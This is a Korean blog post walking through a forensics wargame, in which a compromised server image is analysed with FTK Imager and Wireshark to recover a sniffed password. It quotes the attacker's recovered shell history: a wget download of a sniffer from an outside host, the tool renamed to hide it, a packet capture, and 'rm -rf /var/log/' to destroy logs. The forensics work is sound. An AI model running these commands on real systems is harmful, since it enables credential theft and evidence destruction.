2010/05/25 15:46 WarGame


침입한 해커가 log 등이 삭제된 서버의 img 파일이 주어졌네요

포렌식분야군요

해커가 완벽히 로그를 지우지 않았다면

툴을 이용해 쉽게 내용을 볼 수 있을 겁니다

이러한 툴 종류는 여러가지가 있겠지만

여기서는 Access Data 의 FTK imager 를 써보겠습니다

http://www.accessdata.com/downloads.html

에서 ftk imager 를 받아보실 수 있구요

설치하시고 해당 이미지 파일을 로드 시키면

다음과 같은 모습을 볼 수 있습니다




혹시나 해서 /var/log 폴더를 찾아봤지만 삭제된 상태

/etc/passwd 나 /shadow 폴더도 찾아볼 수 없었습니다

하긴 후자 폴더의 경우는 문제가 의도한 바와는 좀 어긋날 수 있겠죠

아무튼

unallocated space 부분을 보면

몇가지 파일이 남아있습니다

이를 통해서 문제를 풀라 이거겠죠





8개 파일이 있는데

그중에 12792는 웹서버의 로그고

43983은 특정 사용자의 명령어 로그가 남아있네요

 발견하셨다면 반 이상은 푸신거나 다름없죠
ls -al
cd /usr/local/bin
ls -al
id
uname -a
pwd
cd /
ls -al
cat /etc/services
cd /usr/local/lib/python2.6/
wget 192.168.2.108/sniffit
chmod 755 spsn
mv sniffit perlxml
ls -al
ls -al /usr/local/lib/python2.6/
./perlxml -b -t 192.168.2.180 -R /usr/local/lib/python2.6/configx.py -F em0&
ls -alp /usr/local/lib/python2.6/
rm -rf /var/log/
ls -al /var/log/
exit
 

 python2.6 폴더에 sniffit을 받습니다

그리고 이름을 perlxml 로 바꾸고 sniffing 을 시작하죠

관리자가 접속하려 했다면 이때 걸렸을 겁니다

결과는 configx.py 에 저장이 되었고

이후에 로그를 지우는군요

흠 그러니까 캡쳐된 패킷이 어딘가 남아있고, 이를 분석하면 답이 나올껍니다

하지만 이 역시 python 2.6 폴더엔 없고 , unallocated space 에 있는거 같습니다

 elf 파일을 제외하곤 남은게 57224 파일 밖에 없군요

http://wiki.wireshark.org/Development/LibpcapFileFormat

에서 pcap 파일의 Magic Number 를 확인하셔도 되구요

아무튼 그 파일을 export 시켜서 pcap 로 확장자를 변환해주면

WireShark 로 파일을 읽을 수 있게 됩니다

패킷을 뒤적이다 보면 다음과 같이..Sniffing 한 패킷을 볼 수 있습니다



이후에 패스워드가 한자씩 담겨있고 이를 모으면 완성이죠


이런 툴이 싫으시다면

이미지 파일에서 직접 추출하실수도 있습니다

짐작이 가는 string을 찾으시면 되겠죠

로그를 지웠다고 했으니까 rm -rf /var/log 이런식으로 말이죠

거기에 있는 log를 통해 명령어를 보시고

sniffing  툴이 깔린걸 바탕으로 , pcap 파일이 있다는 걸 유추하시면 됩니다

pcap 의 Magic Number 를 search 하셔서 Hex 값을 쭉 뽑아내셔서 마찬가지로

WireShark 로 분석하시면 끗!



저작자 표시
Posted by LinkC
이전버튼 1 ... 57 58 59 60 61 62 63 64 65 ... 171 이전버튼

블로그 이미지
LinkC

태그목록

Tistory Cumulus Flash tag cloud by BLUEnLIVE requires Flash Player 9 or better.

공지사항

Yesterday82
Today41
Total158,033

달력

 « |  » 2014.07
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

최근에 받은 트랙백

글 보관함


티스토리 툴바

. .